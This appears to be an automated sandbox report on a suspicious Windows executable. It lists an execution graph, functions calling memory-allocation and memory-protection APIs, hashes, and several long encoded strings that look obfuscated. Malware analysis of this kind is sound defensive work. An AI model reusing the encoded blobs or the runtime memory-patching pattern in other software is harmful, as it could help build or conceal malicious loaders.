                                                      execution_graph 1180 7ff7938d1ab3 1181 7ff7938d199e 1180->1181 1181->1180 1182 7ff7938d1b36 1181->1182 1184 7ff7938d19e9 VirtualProtect 1181->1184 1185 7ff7938d1a0f 1181->1185 1183 7ff7938d1ba0 4 API calls 1182->1183 1183->1185 1184->1181 1399 7ff7938d216f 1400 7ff7938d2185 1399->1400 1401 7ff7938d2178 InitializeCriticalSection 1399->1401 1401->1400 1402 7ff7938d1a70 1405 7ff7938d199e 1402->1405 1403 7ff7938d19e9 VirtualProtect 1403->1402 1403->1405 1404 7ff7938d1a0f 1405->1402 1405->1403 1405->1404 1406 7ff7938d1b36 1405->1406 1407 7ff7938d1ba0 4 API calls 1406->1407 1407->1404 1410 7ff7938d146d 1411 7ff7938d1394 2 API calls 1410->1411 1274 7ff7938d15e4 1275 7ff7938d1394 2 API calls 1274->1275 1276 7ff7938d15f3 1275->1276 1412 7ff7938d1e65 1413 7ff7938d1e67 signal 1412->1413 1414 7ff7938d1e7c 1413->1414 1416 7ff7938d1e99 1413->1416 1415 7ff7938d1e82 signal 1414->1415 1414->1416 1415->1416 1277 7ff7938d38e0 wcslen 1285 7ff7938d157b 1277->1285 1286 7ff7938d1394 2 API calls 1285->1286 1329 7ff7938d2320 strlen 1330 7ff7938d2337 1329->1330 1186 7ff7938d219e 1187 7ff7938d2272 1186->1187 1188 7ff7938d21ab EnterCriticalSection 1186->1188 1189 7ff7938d2265 LeaveCriticalSection 1188->1189 1190 7ff7938d21c8 1188->1190 1189->1187 1190->1189 1191 7ff7938d21e9 TlsGetValue GetLastError 1190->1191 1191->1190 1147 7ff7938d11d8 1148 7ff7938d11fa 1147->1148 1149 7ff7938d1201 _initterm 1148->1149 1150 7ff7938d121a 1148->1150 1149->1150 1160 7ff7938d1880 1150->1160 1152 7ff7938d1247 SetUnhandledExceptionFilter 1153 7ff7938d126a 1152->1153 1154 7ff7938d126f malloc 1153->1154 1155 7ff7938d128b 1154->1155 1156 7ff7938d12a0 strlen malloc memcpy 1155->1156 1156->1156 1157 7ff7938d12d0 1156->1157 1158 7ff7938d132d _cexit 1157->1158 1159 7ff7938d1338 1157->1159 1158->1159 1161 7ff7938d18a2 1160->1161 1166 7ff7938d1a0f 1160->1166 1162 7ff7938d1956 1161->1162 1165 7ff7938d199e 1161->1165 1161->1166 1162->1165 1170 7ff7938d1ba0 1162->1170 1164 7ff7938d19e9 VirtualProtect 1164->1165 1165->1164 1165->1166 1167 7ff7938d1b36 1165->1167 1166->1152 1168 7ff7938d1ba0 4 API calls 1167->1168 1169 7ff7938d1b53 1168->1169 1169->1166 1173 7ff7938d1bc2 1170->1173 1171 7ff7938d1c04 memcpy 1171->1162 1173->1171 1174 7ff7938d1c45 VirtualQuery 1173->1174 1175 7ff7938d1cf4 1173->1175 1174->1175 1179 7ff7938d1c72 1174->1179 1176 7ff7938d1d23 GetLastError 1175->1176 1178 7ff7938d1d37 1176->1178 1177 7ff7938d1ca4 VirtualProtect 1177->1171 1177->1176 1179->1171 1179->1177 1137 7ff7938d1394 1141 7ff7938d9960 1137->1141 1139 7ff7938d13b8 1140 7ff7938d13c6 NtAllocateVirtualMemoryEx 1139->1140 1142 7ff7938d997e 1141->1142 1145 7ff7938d99ab 1141->1145 1142->1139 1143 7ff7938d9a53 1144 7ff7938d9a6f malloc 1143->1144 1146 7ff7938d9a90 1144->1146 1145->1142 1145->1143 1146->1142 1198 7ff7938d14d6 1200 7ff7938d1394 1198->1200 1201 7ff7938d9960 malloc 1200->1201 1202 7ff7938d13b8 1201->1202 1203 7ff7938d13c6 NtAllocateVirtualMemoryEx 1202->1203 1204 7ff7938d1fd0 1205 7ff7938d1fe4 1204->1205 1206 7ff7938d2033 1204->1206 1205->1206 1207 7ff7938d1ffd EnterCriticalSection LeaveCriticalSection 1205->1207 1207->1206 1287 7ff7938d1e10 1288 7ff7938d1e2f 1287->1288 1289 7ff7938d1ecc 1288->1289 1292 7ff7938d1eb5 1288->1292 1294 7ff7938d1e55 1288->1294 1290 7ff7938d1ed3 signal 1289->1290 1289->1292 1291 7ff7938d1ee4 1290->1291 1290->1292 1291->1292 1293 7ff7938d1eea signal 1291->1293 1293->1292 1294->1292 1295 7ff7938d1f12 signal 1294->1295 1295->1292 1331 7ff7938d2050 1332 7ff7938d20cf 1331->1332 1333 7ff7938d205e EnterCriticalSection 1331->1333 1334 7ff7938d20c2 LeaveCriticalSection 1333->1334 1335 7ff7938d2079 1333->1335 1334->1332 1335->1334 1336 7ff7938d20bd free 1335->1336 1336->1334 1337 7ff7938d6550 1338 7ff7938d6610 wcslen 1337->1338 1339 7ff7938d655d 1337->1339 1386 7ff7938d153f 1338->1386 1339->1338 1387 7ff7938d1394 2 API calls 1386->1387 1388 7ff7938d154e 1387->1388 1389 7ff7938d1394 2 API calls 1388->1389 1417 7ff7938d118b 1418 7ff7938d1190 1417->1418 1419 7ff7938d11b9 _amsg_exit 1417->1419 1418->1419 1420 7ff7938d11a0 Sleep 1418->1420 1422 7ff7938d11fa 1419->1422 1420->1418 1420->1419 1423 7ff7938d1201 _initterm 1422->1423 1424 7ff7938d121a 1422->1424 1423->1424 1425 7ff7938d1880 5 API calls 1424->1425 1426 7ff7938d1247 SetUnhandledExceptionFilter 1425->1426 1427 7ff7938d126a 1426->1427 1428 7ff7938d126f malloc 1427->1428 1429 7ff7938d128b 1428->1429 1430 7ff7938d12a0 strlen malloc memcpy 1429->1430 1430->1430 1431 7ff7938d12d0 1430->1431 1432 7ff7938d132d _cexit 1431->1432 1433 7ff7938d1338 1431->1433 1432->1433 1390 7ff7938d1f47 1391 7ff7938d1e67 signal 1390->1391 1394 7ff7938d1e99 1390->1394 1392 7ff7938d1e7c 1391->1392 1391->1394 1393 7ff7938d1e82 signal 1392->1393 1392->1394 1393->1394 1434 7ff7938d2f88 1437 7ff7938d14a9 1434->1437 1438 7ff7938d1394 2 API calls 1437->1438 1208 7ff7938d1ac3 1209 7ff7938d199e 1208->1209 1210 7ff7938d1b36 1209->1210 1212 7ff7938d1a0f 1209->1212 1213 7ff7938d19e9 VirtualProtect 1209->1213 1211 7ff7938d1ba0 4 API calls 1210->1211 1211->1212 1213->1209 1296 7ff7938d2104 1297 7ff7938d2111 EnterCriticalSection 1296->1297 1298 7ff7938d2218 1296->1298 1300 7ff7938d220b LeaveCriticalSection 1297->1300 1304 7ff7938d212e 1297->1304 1299 7ff7938d2272 1298->1299 1301 7ff7938d2241 DeleteCriticalSection 1298->1301 1303 7ff7938d2230 free 1298->1303 1300->1298 1301->1299 1302 7ff7938d214d TlsGetValue GetLastError 1302->1304 1303->1301 1303->1303 1304->1300 1304->1302 1305 7ff7938d1404 1306 7ff7938d1394 2 API calls 1305->1306 1307 7ff7938d1413 1306->1307 1308 7ff7938d1394 2 API calls 1307->1308 1214 7ff7938d64c0 1217 7ff7938d2df0 1214->1217 1229 7ff7938d2660 1217->1229 1219 7ff7938d2e00 memset 1220 7ff7938d2e3c 1219->1220 1231 7ff7938d2690 1220->1231 1230 7ff7938d266f 1229->1230 1230->1219 1230->1230 1266 7ff7938d155d 1231->1266 1267 7ff7938d1394 2 API calls 1266->1267 1316 7ff7938d1800 1317 7ff7938d1812 1316->1317 1318 7ff7938d1835 fprintf 1317->1318 1319 7ff7938d1000 1320 7ff7938d108b __set_app_type 1319->1320 1321 7ff7938d1040 1319->1321 1323 7ff7938d10b6 1320->1323 1321->1320 1322 7ff7938d10e5 1323->1322 1325 7ff7938d1e00 1323->1325 1326 7ff7938d9ef0 __setusermatherr 1325->1326

                                                      Executed Functions

                                                      Function 00007FF7938D118B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108sleepstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID: &
                                                      • API String ID: 2643109117-1499360005
                                                      • Opcode ID: 7b05b1bcf751b2985ad3cedc123b854032e764e496f5deba70c02dad05f993e7
                                                      • Instruction ID: f217f05b239cc07b18a4c586f8b33e0f4eb47f31cad5ea3b1df9dcd5a36459d5
                                                      • Opcode Fuzzy Hash: 7b05b1bcf751b2985ad3cedc123b854032e764e496f5deba70c02dad05f993e7
                                                      • Instruction Fuzzy Hash: 5D418131E0964281FAF1BB75E554B78A3ADBF84781FC04431C96D733A2DE2EA8618331
                                                      Function 00007FF7938D1394 Relevance: 1.5, APIs: 1, Instructions: 24memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • NtAllocateVirtualMemoryEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7938D1156), ref: 00007FF7938D13F7
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 6eab849e4bd19e69aa9a07cb78ba4307910597b61e1bf347180cd5424be41928
                                                      • Instruction ID: 9ae03e8e457816add63701eb68c108bcdb8cfcf0a9ba48a66b33176b6c9ae0f0
                                                      • Opcode Fuzzy Hash: 6eab849e4bd19e69aa9a07cb78ba4307910597b61e1bf347180cd5424be41928
                                                      • Instruction Fuzzy Hash: 8DF03C3190CB41D2D660EB21F840A2AB3A8FF88380F409835E9AC63724CF3DE465CB70

                                                      Non-executed Functions

                                                      Function 00007FF7938D6550 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 479COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 42 7ff7938d6550-7ff7938d6557 43 7ff7938d6610-7ff7938d66ae wcslen call 7ff7938d153f call 7ff7938d145e 42->43 44 7ff7938d655d-7ff7938d6609 42->44 49 7ff7938d66b4-7ff7938d66bb 43->49 50 7ff7938d6738-7ff7938d674c 43->50 44->43 49->50 52 7ff7938d66bd-7ff7938d672e call 7ff7938d2f70 call 7ff7938d39b0 call 7ff7938d14c7 49->52 53 7ff7938d6795-7ff7938d67ba wcslen 50->53 54 7ff7938d674e-7ff7938d678e 50->54 52->50 68 7ff7938d6730-7ff7938d6733 call 7ff7938d145e 52->68 58 7ff7938d67c0-7ff7938d67d0 _wcsnicmp 53->58 54->53 60 7ff7938d67d6-7ff7938d67ea wcslen 58->60 61 7ff7938d68dc 58->61 60->58 63 7ff7938d67ec 60->63 64 7ff7938d68e0-7ff7938d68f4 61->64 63->64 69 7ff7938d68f6-7ff7938d6952 64->69 70 7ff7938d6959-7ff7938d6a11 memset wcscpy wcscat call 7ff7938d2f70 call 7ff7938d3350 call 7ff7938d14c7 memset 64->70 68->50 69->70 78 7ff7938d7df5-7ff7938d7e37 call 7ff7938d1370 70->78 79 7ff7938d6a17-7ff7938d6a1e 70->79 81 7ff7938d6a20-7ff7938d6a60 78->81 86 7ff7938d7e3d 78->86 79->81 82 7ff7938d6a67-7ff7938d6a77 wcslen 79->82 81->82 84 7ff7938d6ab9-7ff7938d6abb 82->84 85 7ff7938d6a79-7ff7938d6a85 82->85 88 7ff7938d6ac1-7ff7938d6aeb wcscat memset 84->88 87 7ff7938d6a90-7ff7938d6aa0 _wcsnicmp 85->87 86->82 91 7ff7938d6aa2-7ff7938d6ab5 wcslen 87->91 92 7ff7938d6abd 87->92 89 7ff7938d6af1-7ff7938d6af8 88->89 90 7ff7938d7e42-7ff7938d7e8d call 7ff7938d1370 88->90 93 7ff7938d6b54-7ff7938d6b83 wcscpy wcscat 89->93 94 7ff7938d6afa-7ff7938d6b4d 89->94 90->94 102 7ff7938d7e93 90->102 91->87 96 7ff7938d6ab7 91->96 92->88 97 7ff7938d7e98-7ff7938d7ebe call 7ff7938d9750 call 7ff7938d1370 93->97 98 7ff7938d6b89-7ff7938d6b90 93->98 94->93 96->88 100 7ff7938d6b96-7ff7938d6c40 97->100 119 7ff7938d7ec4 97->119 98->100 101 7ff7938d6c47-7ff7938d6c4e 98->101 100->101 104 7ff7938d6c54-7ff7938d6c5b 101->104 105 7ff7938d7ec9-7ff7938d7f0b call 7ff7938d1370 101->105 102->93 107 7ff7938d6ca4-7ff7938d6cab 104->107 108 7ff7938d6c5d-7ff7938d6c9d 104->108 105->108 115 7ff7938d7f11 105->115 111 7ff7938d7f16-7ff7938d7f50 memcpy call 7ff7938d1370 107->111 112 7ff7938d6cb1-7ff7938d6cb8 107->112 108->107 118 7ff7938d6cbe-7ff7938d6cda 111->118 123 7ff7938d7f56 111->123 117 7ff7938d6e1d-7ff7938d6ebb wcslen call 7ff7938d153f call 7ff7938d145e 112->117 112->118 115->107 128 7ff7938d6f51 117->128 129 7ff7938d6ec1-7ff7938d6ec8 117->129 121 7ff7938d6ce0-7ff7938d6d38 118->121 119->101 121->121 124 7ff7938d6d3a-7ff7938d6e16 121->124 123->117 124->117 131 7ff7938d6f5d-7ff7938d6f79 128->131 132 7ff7938d6f58 call 7ff7938d145e 128->132 129->128 130 7ff7938d6ece-7ff7938d6f47 call 7ff7938d2f70 call 7ff7938d39b0 call 7ff7938d14c7 129->130 130->128 139 7ff7938d6f49-7ff7938d6f4c call 7ff7938d145e 130->139 132->131 139->128
                                                      APIs
                                                      Strings
                                                      • X&, xrefs: 00007FF7938D6EDC
                                                      • LC7xbnB5b3ppcXpthZJkestid3FxaWFpKGZneXdwcXBhdGFuc3lvem1xem16bWR6c2J3cXFpYWloZmd5X3FxcG9r22BzzWa3TMl7IbdMMBIaEVcBAwYGGwkLRxoWHh8fFVQDC1MLGhRNGBRNPiI3Wh4NExRfZGxjTGZneXdwcXBcBJo3Cmj6cBRg72cDfPFwQQvhegF49GNaD/dy32HkelMd8GUcaPpwAR8SZwd88XAfDOZ6G3j0YwQI93JnYeR6DRr3, xrefs: 00007FF7938D6ECE
                                                      • LC7xbnB5b3ppcXpthZJkestid3FxaWFpKGZneXdwcXBhdGFuc3lvem1xem16bWR6c2J3cXFpYWloZmd5l3BxcG9r22BzzWa3TMl7IbdMMBIaEVcBAwYGGwkLRxoWHh8fFVQDC1MLGhRNGBRNPiI3Wh4NExRfZGxjTGZneXdwcXBUTg+SAiJv1RwqesILNmTVAjl23gwyYcY++xzWAytx3zfpHMEDIm/VO+wXwgg2ZNUl/wbeATJhxj77G9YHK3HfN+kZ, xrefs: 00007FF7938D6995
                                                      • LC4ZbnJ5b3ppcXptem1kenNid3FxaWFpKGZneXdwcXBhdGFuc3lvem1xem16bWR6c2J3cXFpYWloZmd5D3BxcG9r22BzzWa3TMl7IbdMMBIaEVcBAwYGGwkLRxoWHh8fFVQDC1MLGhRNGBRNPiI3Wh4NExRfTWFpOCNneRP2dnCKrCIIc3lvem1xem2KbUZ6eGB5cXE7YWloeGd5d3BxcCFlYW5zaW96bXF6LXttZHpzcndxcWthaW5mZ3l3cHFwZ3Rh, xrefs: 00007FF7938D66BD
                                                      • 0, xrefs: 00007FF7938D6E69
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: wcslen$_wcsnicmp
                                                      • String ID: 0$LC4ZbnJ5b3ppcXptem1kenNid3FxaWFpKGZneXdwcXBhdGFuc3lvem1xem16bWR6c2J3cXFpYWloZmd5D3BxcG9r22BzzWa3TMl7IbdMMBIaEVcBAwYGGwkLRxoWHh8fFVQDC1MLGhRNGBRNPiI3Wh4NExRfTWFpOCNneRP2dnCKrCIIc3lvem1xem2KbUZ6eGB5cXE7YWloeGd5d3BxcCFlYW5zaW96bXF6LXttZHpzcndxcWthaW5mZ3l3cHFwZ3Rh$LC7xbnB5b3ppcXpthZJkestid3FxaWFpKGZneXdwcXBhdGFuc3lvem1xem16bWR6c2J3cXFpYWloZmd5X3FxcG9r22BzzWa3TMl7IbdMMBIaEVcBAwYGGwkLRxoWHh8fFVQDC1MLGhRNGBRNPiI3Wh4NExRfZGxjTGZneXdwcXBcBJo3Cmj6cBRg72cDfPFwQQvhegF49GNaD/dy32HkelMd8GUcaPpwAR8SZwd88XAfDOZ6G3j0YwQI93JnYeR6DRr3$LC7xbnB5b3ppcXpthZJkestid3FxaWFpKGZneXdwcXBhdGFuc3lvem1xem16bWR6c2J3cXFpYWloZmd5l3BxcG9r22BzzWa3TMl7IbdMMBIaEVcBAwYGGwkLRxoWHh8fFVQDC1MLGhRNGBRNPiI3Wh4NExRfZGxjTGZneXdwcXBUTg+SAiJv1RwqesILNmTVAjl23gwyYcY++xzWAytx3zfpHMEDIm/VO+wXwgg2ZNUl/wbeATJhxj77G9YHK3HfN+kZ$X&
                                                      • API String ID: 4256727079-1051649685
                                                      • Opcode ID: 0edce3d47a61e15280e329d8b66cfce23b68d5c968ef05906b2626a2a5b586f2
                                                      • Instruction ID: b6f9711112fa1a362d99e72542440e9309142ab74ef5b4fd2aeadaf42d97bcdc
                                                      • Opcode Fuzzy Hash: 0edce3d47a61e15280e329d8b66cfce23b68d5c968ef05906b2626a2a5b586f2
                                                      • Instruction Fuzzy Hash: 9A529E21D2C68684F7B1EB39A8117F4E3A8AF55384FC44332D9AD366A1EF6D6654C330
                                                      Function 00007FF7938D11D8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                      • String ID: &
                                                      • API String ID: 3825114775-1499360005
                                                      • Opcode ID: 1374fe09d127b8ec737a1f36db43dc2c06298e6b629ae171b61fc4886b83ba6d
                                                      • Instruction ID: c0a1c8908340865846a928c24618a118d97642b73be2f9f897b3b60598e3c7f9
                                                      • Opcode Fuzzy Hash: 1374fe09d127b8ec737a1f36db43dc2c06298e6b629ae171b61fc4886b83ba6d
                                                      • Instruction Fuzzy Hash: F0415E35A0864281FAF1FB75E454B78A36DAF84781FC04032C95D737A2DE6EB8648331
                                                      Function 00007FF7938D3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscatwcscpywcslen
                                                      • String ID: $0$0$@$@
                                                      • API String ID: 4263182637-1413854666
                                                      • Opcode ID: a275fb23657a88cb8887fae34cf2d4a1292e796e49282ae3ad477134c8cfb3f8
                                                      • Instruction ID: ab21271e6ca1160e477051010c431a5e4900ed40ee0aa0d8923eb0fc9c82a2f0
                                                      • Opcode Fuzzy Hash: a275fb23657a88cb8887fae34cf2d4a1292e796e49282ae3ad477134c8cfb3f8
                                                      • Instruction Fuzzy Hash: 76B1AF2191C6C285F3B1AB24F454BAAB7A8FF84344F800236EAC862695DF7DD556CB21
                                                      Function 00007FF7938D2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                      • String ID: 0$X$`
                                                      • API String ID: 329590056-2527496196
                                                      • Opcode ID: 167915f824477ce25bf633221858cfc784a2430d342e6f666951a70b3a710d20
                                                      • Instruction ID: aa7dd243ca4725f2bf42d284b5c446548b93ee2b42be759e01ed061a530a836a
                                                      • Opcode Fuzzy Hash: 167915f824477ce25bf633221858cfc784a2430d342e6f666951a70b3a710d20
                                                      • Instruction Fuzzy Hash: C902A322908BC181E7B1EB25E404BAAB7A8FB85794F804235DAEC637E5DF3DD155C720
                                                      Function 00007FF7938D1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF7938DB864,00007FF7938DB864,?,?,00007FF7938D0000,?,00007FF7938D1991), ref: 00007FF7938D1C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF7938DB864,00007FF7938DB864,?,?,00007FF7938D0000,?,00007FF7938D1991), ref: 00007FF7938D1CC7
                                                      • memcpy.MSVCRT ref: 00007FF7938D1CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,00007FF7938DB864,00007FF7938DB864,?,?,00007FF7938D0000,?,00007FF7938D1991), ref: 00007FF7938D1D23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: 6f36f86a525a45475d5f7f9479fc56c10debc891ecdaa8539843710fc4bdbf4e
                                                      • Instruction ID: 3056176e567de2e20650e1df1f8dc35f6f849310219c392897e14412a54e05b8
                                                      • Opcode Fuzzy Hash: 6f36f86a525a45475d5f7f9479fc56c10debc891ecdaa8539843710fc4bdbf4e
                                                      • Instruction Fuzzy Hash: 1C41D471A0860281EAF1AB62D444AB8A769EF84BC4FD44032CD1D67395DF3EE555C330
                                                      Function 00007FF7938D2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000028.00000002.295206069460.00007FF7938D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7938D0000, based on PE: true
                                                      • Associated: 00000028.00000002.295206038588.00007FF7938D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206105456.00007FF7938DA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206162311.00007FF7938DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206669921.00007FF793B5C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000028.00000002.295206700019.00007FF793B5F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_40_2_7ff7938d0000_gfqyepapamry.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                      • String ID:
                                                      • API String ID: 3326252324-0
                                                      • Opcode ID: fcfb865cc866e343a2c7847951ca254683af2e392602174b24cc102a20d99233
                                                      • Instruction ID: 2317fb6b7e73f3b3081fa609d373333dab5ebd217c559b1b301cc5322b9c7b72
                                                      • Opcode Fuzzy Hash: fcfb865cc866e343a2c7847951ca254683af2e392602174b24cc102a20d99233
                                                      • Instruction Fuzzy Hash: D9211A24A0860681FAB6AB71E914B34E368BF40B91FC44031D96D776A4DF2EA8628330
                                                      Function 00007FF7938D1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
